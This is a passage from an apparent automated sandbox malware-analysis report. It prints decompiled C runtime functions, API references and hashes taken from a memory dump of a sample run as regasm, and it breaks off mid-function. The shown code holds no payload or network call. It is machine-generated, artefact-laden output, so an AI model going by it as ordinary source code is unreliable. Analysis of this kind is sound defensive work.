                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Console$EnumFile$AliasesCharacterCodeCopyDateFindFlagsFormatsInputLengthLocalMutexNextOpenOutputPagesReadSystemWrite
                                                                                  • String ID: cibabuwop$dayacukifasajegezu jalovu saragoyilu$vifukatupa
                                                                                  • API String ID: 22480466-1622075781
                                                                                  • Opcode ID: 8dea867adb2d5208ed33f4556dbb09b6ae84f49a9dc3ab90d2b7bd95b799d0bb
                                                                                  • Instruction ID: 4f394daf488e5aa406f9588235213acc55cb37b7dc0229e06a1d065f176233ed
                                                                                  • Opcode Fuzzy Hash: 8dea867adb2d5208ed33f4556dbb09b6ae84f49a9dc3ab90d2b7bd95b799d0bb
                                                                                  • Instruction Fuzzy Hash: 21218175502468BBC7219F519D48DDF3FBCEF8A395B100066F609B24A0D3384685DBB9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 92%
                                                                                  			E00408EE2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				struct HINSTANCE__* _t23;
                                                                                  				intOrPtr _t28;
                                                                                  				intOrPtr _t32;
                                                                                  				intOrPtr _t45;
                                                                                  				void* _t46;
                                                                                  
                                                                                  				_t35 = __ebx;
                                                                                  				_push(0xc);
                                                                                  				_push(0x419538);
                                                                                  				E0040A19C(__ebx, __edi, __esi);
                                                                                  				_t44 = L"KERNEL32.DLL";
                                                                                  				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                  				if(_t23 == 0) {
                                                                                  					_t23 = E0040A38C(_t44);
                                                                                  				}
                                                                                  				 *(_t46 - 0x1c) = _t23;
                                                                                  				_t45 =  *((intOrPtr*)(_t46 + 8));
                                                                                  				 *((intOrPtr*)(_t45 + 0x5c)) = 0x402820;
                                                                                  				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                                                                                  				if(_t23 != 0) {
                                                                                  					_t35 = GetProcAddress;
                                                                                  					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                                                                                  					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                                                                                  				}
                                                                                  				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                                                                                  				 *((char*)(_t45 + 0xc8)) = 0x43;
                                                                                  				 *((char*)(_t45 + 0x14b)) = 0x43;
                                                                                  				 *(_t45 + 0x68) = 0x42ba90;
                                                                                  				E0040D6F9(_t35, 1, 0xd);
                                                                                  				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                  				InterlockedIncrement( *(_t45 + 0x68));
                                                                                  				 *(_t46 - 4) = 0xfffffffe;
                                                                                  				E00408FB7();
                                                                                  				E0040D6F9(_t35, 1, 0xc);
                                                                                  				 *(_t46 - 4) = 1;
                                                                                  				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                                                                                  				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                                                                                  				if(_t28 == 0) {
                                                                                  					_t32 =  *0x42c098; // 0x42bfc0
                                                                                  					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                                                                                  				}
                                                                                  				E0040EDF9( *((intOrPtr*)(_t45 + 0x6c)));
                                                                                  				 *(_t46 - 4) = 0xfffffffe;
                                                                                  				return E0040A1E1(E00408FC0());
                                                                                  			}








                                                                                  0x00408ee2
                                                                                  0x00408ee2
                                                                                  0x00408ee4
                                                                                  0x00408ee9
                                                                                  0x00408eee
                                                                                  0x00408ef4
                                                                                  0x00408efc
                                                                                  0x00408eff
                                                                                  0x00408f04
                                                                                  0x00408f05
                                                                                  0x00408f08
                                                                                  0x00408f0b
                                                                                  0x00408f15
                                                                                  0x00408f1a
                                                                                  0x00408f22
                                                                                  0x00408f2a
                                                                                  0x00408f3a
                                                                                  0x00408f3a
                                                                                  0x00408f40
                                                                                  0x00408f43
                                                                                  0x00408f4a
                                                                                  0x00408f51
                                                                                  0x00408f5a
                                                                                  0x00408f60
                                                                                  0x00408f67
                                                                                  0x00408f6d
                                                                                  0x00408f74
                                                                                  0x00408f7b
                                                                                  0x00408f81
                                                                                  0x00408f84
                                                                                  0x00408f87
                                                                                  0x00408f8c
                                                                                  0x00408f8e
                                                                                  0x00408f93
                                                                                  0x00408f93
                                                                                  0x00408f99
                                                                                  0x00408f9f
                                                                                  0x00408fb0

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00419538,0000000C,0040901D,00000000,00000000,?,?,0040756C,00406F99,00000001,?,00405DD3,00000001,?), ref: 00408EF4
                                                                                  • __crt_waiting_on_module_handle.LIBCMT ref: 00408EFF
                                                                                    • Part of subcall function 0040A38C: Sleep.KERNEL32(000003E8,?,?,00408E45,KERNEL32.DLL,?,00409475,?,00406F93,?,00000001,?,00405DD3,00000001,?), ref: 0040A398
                                                                                    • Part of subcall function 0040A38C: GetModuleHandleW.KERNEL32(?,?,?,00408E45,KERNEL32.DLL,?,00409475,?,00406F93,?,00000001,?,00405DD3,00000001,?), ref: 0040A3A1
                                                                                  • GetProcAddress.KERNEL32(00000000,EncodePointer,?,?,?,?,?,?,?,?,?,0040756C,00406F99,00000001,?,00405DD3), ref: 00408F28
                                                                                  • GetProcAddress.KERNEL32(?,DecodePointer,?,?,?,?,?,?,?,?,?,0040756C,00406F99,00000001,?,00405DD3), ref: 00408F38
                                                                                  • __lock.LIBCMT ref: 00408F5A
                                                                                  • InterlockedIncrement.KERNEL32(0042BA90), ref: 00408F67
                                                                                  • __lock.LIBCMT ref: 00408F7B
                                                                                  • ___addlocaleref.LIBCMT ref: 00408F99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                  • API String ID: 1028249917-2843748187
                                                                                  • Opcode ID: affc172553edc911e22e2c1efac07dc5c77096941ee13afcbf782abe80117812
                                                                                  • Instruction ID: b91507630efbac5c8cf355a45667cfd3811c8f0a29f11a86326235d8ec8bd35b
                                                                                  • Opcode Fuzzy Hash: affc172553edc911e22e2c1efac07dc5c77096941ee13afcbf782abe80117812
                                                                                  • Instruction Fuzzy Hash: 2B119071900B019ED720EF7A9A0579ABBE0AF44318F10453FE5D9B62E1CBB89A40CF5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E004097ED(intOrPtr __ecx) {
                                                                                  				void* _t47;
                                                                                  				intOrPtr _t48;
                                                                                  				void* _t53;
                                                                                  				void* _t54;
                                                                                  				void* _t56;
                                                                                  				intOrPtr _t57;
                                                                                  				void* _t58;
                                                                                  				void* _t61;
                                                                                  
                                                                                  				_push(0x2c);
                                                                                  				_push(0x419648);
                                                                                  				E0040A19C(_t47, _t54, _t56);
                                                                                  				_t48 = __ecx;
                                                                                  				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                                                  				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                                                  				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                                                  				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                                                  				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                                                  				 *((intOrPtr*)(_t58 - 0x28)) = E00406715(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                                                  				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00409042(__ecx, _t53, _t61) + 0x88));
                                                                                  				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00409042(_t48, _t53, _t61) + 0x8c));
                                                                                  				 *((intOrPtr*)(E00409042(_t48, _t53, _t61) + 0x88)) = _t57;
                                                                                  				 *((intOrPtr*)(E00409042(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                                                                  				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                  				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                                                                  				 *(_t58 - 4) = 1;
                                                                                  				 *((intOrPtr*)(_t58 - 0x1c)) = E004067BA(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                                                                  				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                  				 *(_t58 - 4) = 0xfffffffe;
                                                                                  				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                                                  				E00409913(_t48, _t53, _t55, _t57, _t61);
                                                                                  				return E0040A1E1( *((intOrPtr*)(_t58 - 0x1c)));
                                                                                  			}











                                                                                  0x004097ed
                                                                                  0x004097ef
                                                                                  0x004097f4
                                                                                  0x004097f9
                                                                                  0x004097fb
                                                                                  0x004097fe
                                                                                  0x00409801
                                                                                  0x00409804
                                                                                  0x0040980b
                                                                                  0x0040981c
                                                                                  0x0040982a
                                                                                  0x00409838
                                                                                  0x00409840
                                                                                  0x0040984e
                                                                                  0x00409854
                                                                                  0x0040985b
                                                                                  0x0040985e
                                                                                  0x00409874
                                                                                  0x00409877
                                                                                  0x004098ec
                                                                                  0x004098f3
                                                                                  0x004098fa
                                                                                  0x00409907

                                                                                  APIs
                                                                                  • __CreateFrameInfo.LIBCMT ref: 00409815
                                                                                    • Part of subcall function 00406715: __getptd.LIBCMT ref: 00406723
                                                                                    • Part of subcall function 00406715: __getptd.LIBCMT ref: 00406731
                                                                                  • __getptd.LIBCMT ref: 0040981F
                                                                                    • Part of subcall function 00409042: __getptd_noexit.LIBCMT ref: 00409045
                                                                                    • Part of subcall function 00409042: __amsg_exit.LIBCMT ref: 00409052
                                                                                  • __getptd.LIBCMT ref: 0040982D
                                                                                  • __getptd.LIBCMT ref: 0040983B
                                                                                  • __getptd.LIBCMT ref: 00409846
                                                                                  • _CallCatchBlock2.LIBCMT ref: 0040986C
                                                                                    • Part of subcall function 004067BA: __CallSettingFrame@12.LIBCMT ref: 00406806
                                                                                    • Part of subcall function 00409913: __getptd.LIBCMT ref: 00409922
                                                                                    • Part of subcall function 00409913: __getptd.LIBCMT ref: 00409930
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 1602911419-0
                                                                                  • Opcode ID: f37011f87fdd16fb54d4f0b68c971a28315227988aff2eab950f70c42f6dc1f8
                                                                                  • Instruction ID: bdc00da914de4fe058e5a73a6823527bf149df6fbf21d64175d3823fc1a074ea
                                                                                  • Opcode Fuzzy Hash: f37011f87fdd16fb54d4f0b68c971a28315227988aff2eab950f70c42f6dc1f8
                                                                                  • Instruction Fuzzy Hash: C611C6B1D002099FDB00EFA5C446AAD7BB0FF04318F10856AF854AB292DB7D9A119F59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 83%
                                                                                  			E00406383(char _a4) {
                                                                                  				signed int _v16;
                                                                                  				char _v20;
                                                                                  				long _v24;
                                                                                  				signed int _v32;
                                                                                  				void* _v36;
                                                                                  				long _v40;
                                                                                  				void _v60;
                                                                                  				void* __edi;
                                                                                  				void* _t20;
                                                                                  				signed int _t21;
                                                                                  				signed int _t26;
                                                                                  				DWORD* _t27;
                                                                                  				void* _t30;
                                                                                  				signed int _t34;
                                                                                  				void* _t38;
                                                                                  
                                                                                  				while(1) {
                                                                                  					_t2 =  &_a4; // 0x404b2e
                                                                                  					_t20 = E00406EDA(_t30, _t38,  *_t2);
                                                                                  					if(_t20 != 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t21 = E00409465(_a4);
                                                                                  					__eflags = _t21;
                                                                                  					if(_t21 == 0) {
                                                                                  						__eflags =  *0x58daa0 & 0x00000001;
                                                                                  						if(( *0x58daa0 & 0x00000001) == 0) {
                                                                                  							 *0x58daa0 =  *0x58daa0 | 0x00000001;
                                                                                  							__eflags =  *0x58daa0;
                                                                                  							E00406368(0x58da94);
                                                                                  							E0040943F( *0x58daa0, 0x417062);
                                                                                  						}
                                                                                  						E00404B97( &_v16, 0x58da94);
                                                                                  						_push(0x419080);
                                                                                  						_push( &_v16);
                                                                                  						L7();
                                                                                  						asm("int3");
                                                                                  						_push(0x58da94);
                                                                                  						_push(_t38);
                                                                                  						_t34 = 8;
                                                                                  						_v36 = memcpy( &_v60, 0x401788, _t34 << 2);
                                                                                  						_t26 = _v16;
                                                                                  						_v32 = _t26;
                                                                                  						__eflags = _t26;
                                                                                  						if(_t26 != 0) {
                                                                                  							__eflags =  *_t26 & 0x00000008;
                                                                                  							if(( *_t26 & 0x00000008) != 0) {
                                                                                  								_v20 = 0x1994000;
                                                                                  							}
                                                                                  						}
                                                                                  						_t27 =  &_v20;
                                                                                  						RaiseException(_v40, _v36, _v24, _t27);
                                                                                  						return _t27;
                                                                                  					} else {
                                                                                  						continue;
                                                                                  					}
                                                                                  					L11:
                                                                                  				}
                                                                                  				return _t20;
                                                                                  				goto L11;
                                                                                  			}


















                                                                                  0x0040639a
                                                                                  0x0040639a
                                                                                  0x0040639d
                                                                                  0x004063a5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406390
                                                                                  0x00406396
                                                                                  0x00406398
                                                                                  0x004063a9
                                                                                  0x004063b5
                                                                                  0x004063b7
                                                                                  0x004063b7
                                                                                  0x004063c0
                                                                                  0x004063ca
                                                                                  0x004063cf
                                                                                  0x004063d4
                                                                                  0x004063d9
                                                                                  0x004063e1
                                                                                  0x004063e2
                                                                                  0x004063e7
                                                                                  0x004063f3
                                                                                  0x004063f4
                                                                                  0x004063f7
                                                                                  0x00406402
                                                                                  0x00406405
                                                                                  0x00406409
                                                                                  0x0040640d
                                                                                  0x0040640f
                                                                                  0x00406411
                                                                                  0x00406414
                                                                                  0x00406416
                                                                                  0x00406416
                                                                                  0x00406414
                                                                                  0x0040641d
                                                                                  0x0040642a
                                                                                  0x00406431
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406398
                                                                                  0x004063a8
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0040639D
                                                                                    • Part of subcall function 00406EDA: __FF_MSGBANNER.LIBCMT ref: 00406EFD
                                                                                    • Part of subcall function 00406EDA: __NMSG_WRITE.LIBCMT ref: 00406F04
                                                                                    • Part of subcall function 00406EDA: HeapAlloc.KERNEL32(00000000,?,?,?,00000001,?,00405DD3,00000001,?,?,?,?,?,00403F1F,?), ref: 00406F51
                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 004063C0
                                                                                    • Part of subcall function 00406368: std::exception::exception.LIBCMT ref: 00406374
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 004063D4
                                                                                  • __CxxThrowException@8.LIBCMT ref: 004063E2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                  • String ID: .K@
                                                                                  • API String ID: 3622535130-2831377830
                                                                                  • Opcode ID: 760bccbb62e4a862e435c7c4c67d232197d559e831b150070bae98c8b4178f28
                                                                                  • Instruction ID: 6f69bf005d3a5247e48faa66655218d819e4cae75f5cc9c1e131bdbf594948c8
                                                                                  • Opcode Fuzzy Hash: 760bccbb62e4a862e435c7c4c67d232197d559e831b150070bae98c8b4178f28
                                                                                  • Instruction Fuzzy Hash: FAF0BE30A0430466CB087A21D802A9A3BA86B40718B22403BFC07B50D2CF7C9955D2AD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 74%
                                                                                  			E0040953C(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                                                  				signed int _v8;
                                                                                  				void* __ebp;
                                                                                  				intOrPtr* _t15;
                                                                                  				intOrPtr* _t18;
                                                                                  				void* _t22;
                                                                                  
                                                                                  				_t25 = __esi;
                                                                                  				_t24 = __edi;
                                                                                  				_t23 = __edx;
                                                                                  				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
                                                                                  				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
                                                                                  					__eflags =  *((intOrPtr*)(E00409042(_t22, __edx, __eflags) + 0x90));
                                                                                  					if(__eflags > 0) {
                                                                                  						_t15 = E00409042(_t22, __edx, __eflags) + 0x90;
                                                                                  						 *_t15 =  *_t15 - 1;
                                                                                  						__eflags =  *_t15;
                                                                                  					}
                                                                                  					goto L9;
                                                                                  				} else {
                                                                                  					__eflags = __eax - 0xe06d7363;
                                                                                  					if(__eflags != 0) {
                                                                                  						L9:
                                                                                  						__eflags = 0;
                                                                                  						return 0;
                                                                                  					} else {
                                                                                  						 *(E00409042(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
                                                                                  						_push(8);
                                                                                  						_push(0x419450);
                                                                                  						E0040A19C(_t22, __edi, __esi);
                                                                                  						_t18 =  *((intOrPtr*)(E00409042(_t22, __edx, _t30) + 0x78));
                                                                                  						if(_t18 != 0) {
                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                  							 *_t18();
                                                                                  							_v8 = 0xfffffffe;
                                                                                  						}
                                                                                  						return E0040A1E1(E004068D0(_t22, _t23, _t24, _t25));
                                                                                  					}
                                                                                  				}
                                                                                  			}








                                                                                  0x0040953c
                                                                                  0x0040953c
                                                                                  0x0040953c
                                                                                  0x00409548
                                                                                  0x0040954d
                                                                                  0x0040956c
                                                                                  0x00409573
                                                                                  0x0040957a
                                                                                  0x0040957f
                                                                                  0x0040957f
                                                                                  0x0040957f
                                                                                  0x00000000
                                                                                  0x0040954f
                                                                                  0x0040954f
                                                                                  0x00409554
                                                                                  0x00409581
                                                                                  0x00409581
                                                                                  0x00409584
                                                                                  0x00409556
                                                                                  0x0040955b
                                                                                  0x0040683b
                                                                                  0x0040683d
                                                                                  0x00406842
                                                                                  0x0040684c
                                                                                  0x00406851
                                                                                  0x00406853
                                                                                  0x00406857
                                                                                  0x00406862
                                                                                  0x00406862
                                                                                  0x00406873
                                                                                  0x00406873
                                                                                  0x00409554

                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 00409556
                                                                                    • Part of subcall function 00409042: __getptd_noexit.LIBCMT ref: 00409045
                                                                                    • Part of subcall function 00409042: __amsg_exit.LIBCMT ref: 00409052
                                                                                  • __getptd.LIBCMT ref: 00409567
                                                                                  • __getptd.LIBCMT ref: 00409575
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                  • String ID: MOC$csm
                                                                                  • API String ID: 803148776-1389381023
                                                                                  • Opcode ID: 79edc0a518ba9469f2ba53198a8b45b6bd2c90eac2c121f6cec3718a3dc5b6f0
                                                                                  • Instruction ID: 25570a2a0e47988da68abf3a0aaae6260f908b3a2019b21a9d0d5ec76261f29b
                                                                                  • Opcode Fuzzy Hash: 79edc0a518ba9469f2ba53198a8b45b6bd2c90eac2c121f6cec3718a3dc5b6f0
                                                                                  • Instruction Fuzzy Hash: 43E04FB26142049FC710ABAAC446B6A3394EB98318F1604B7F40CE73E3C73CDC50978A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E0040E7F3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				signed int _t15;
                                                                                  				LONG* _t21;
                                                                                  				long _t23;
                                                                                  				void* _t31;
                                                                                  				LONG* _t33;
                                                                                  				void* _t34;
                                                                                  				void* _t35;
                                                                                  
                                                                                  				_t35 = __eflags;
                                                                                  				_t29 = __edx;
                                                                                  				_t25 = __ebx;
                                                                                  				_push(0xc);
                                                                                  				_push(0x419768);
                                                                                  				E0040A19C(__ebx, __edi, __esi);
                                                                                  				_t31 = E00409042(__ebx, __edx, _t35);
                                                                                  				_t15 =  *0x42bfb4; // 0xfffffffe
                                                                                  				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                  					E0040D6F9(_t25, _t31, 0xd);
                                                                                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                  					_t33 =  *(_t31 + 0x68);
                                                                                  					 *(_t34 - 0x1c) = _t33;
                                                                                  					__eflags = _t33 -  *0x42beb8; // 0x1e31798
                                                                                  					if(__eflags != 0) {
                                                                                  						__eflags = _t33;
                                                                                  						if(_t33 != 0) {
                                                                                  							_t23 = InterlockedDecrement(_t33);
                                                                                  							__eflags = _t23;
                                                                                  							if(_t23 == 0) {
                                                                                  								__eflags = _t33 - 0x42ba90;
                                                                                  								if(__eflags != 0) {
                                                                                  									_push(_t33);
                                                                                  									E00406FA4(_t25, _t31, _t33, __eflags);
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_t21 =  *0x42beb8; // 0x1e31798
                                                                                  						 *(_t31 + 0x68) = _t21;
                                                                                  						_t33 =  *0x42beb8; // 0x1e31798
                                                                                  						 *(_t34 - 0x1c) = _t33;
                                                                                  						InterlockedIncrement(_t33);
                                                                                  					}
                                                                                  					 *(_t34 - 4) = 0xfffffffe;
                                                                                  					E0040E88E();
                                                                                  				} else {
                                                                                  					_t33 =  *(_t31 + 0x68);
                                                                                  				}
                                                                                  				if(_t33 == 0) {
                                                                                  					E0040A3BC(_t29, 0x20);
                                                                                  				}
                                                                                  				return E0040A1E1(_t33);
                                                                                  			}










                                                                                  0x0040e7f3
                                                                                  0x0040e7f3
                                                                                  0x0040e7f3
                                                                                  0x0040e7f3
                                                                                  0x0040e7f5
                                                                                  0x0040e7fa
                                                                                  0x0040e804
                                                                                  0x0040e806
                                                                                  0x0040e80e
                                                                                  0x0040e82f
                                                                                  0x0040e835
                                                                                  0x0040e839
                                                                                  0x0040e83c
                                                                                  0x0040e83f
                                                                                  0x0040e845
                                                                                  0x0040e847
                                                                                  0x0040e849
                                                                                  0x0040e84c
                                                                                  0x0040e852
                                                                                  0x0040e854
                                                                                  0x0040e856
                                                                                  0x0040e85c
                                                                                  0x0040e85e
                                                                                  0x0040e85f
                                                                                  0x0040e864
                                                                                  0x0040e85c
                                                                                  0x0040e854
                                                                                  0x0040e865
                                                                                  0x0040e86a
                                                                                  0x0040e86d
                                                                                  0x0040e873
                                                                                  0x0040e877
                                                                                  0x0040e877
                                                                                  0x0040e87d
                                                                                  0x0040e884
                                                                                  0x0040e816
                                                                                  0x0040e816
                                                                                  0x0040e816
                                                                                  0x0040e81b
                                                                                  0x0040e81f
                                                                                  0x0040e824
                                                                                  0x0040e82c

                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0040E7FF
                                                                                    • Part of subcall function 00409042: __getptd_noexit.LIBCMT ref: 00409045
                                                                                    • Part of subcall function 00409042: __amsg_exit.LIBCMT ref: 00409052
                                                                                  • __amsg_exit.LIBCMT ref: 0040E81F
                                                                                  • __lock.LIBCMT ref: 0040E82F
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E84C
                                                                                  • InterlockedIncrement.KERNEL32(01E31798), ref: 0040E877
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 4271482742-0
                                                                                  • Opcode ID: 9ab21ac5637a5df9d1e5649fcb65b380769d9fc41e39bba92bb42fed8679d9ec
                                                                                  • Instruction ID: 4ce38fb669b5de8dcd077e1ebd56d525cc9c443ed3b9906204361efa2047f9ed
                                                                                  • Opcode Fuzzy Hash: 9ab21ac5637a5df9d1e5649fcb65b380769d9fc41e39bba92bb42fed8679d9ec
                                                                                  • Instruction Fuzzy Hash: 9C015B32A00611DBD721BB67990679A77A0AF04724F05883BE810777D1CB7CA9A1CBDE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 39%
                                                                                  			E00406FA4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				intOrPtr* _t10;
                                                                                  				intOrPtr _t13;
                                                                                  				intOrPtr _t23;
                                                                                  				void* _t25;
                                                                                  
                                                                                  				_push(0xc);
                                                                                  				_push(0x4194f8);
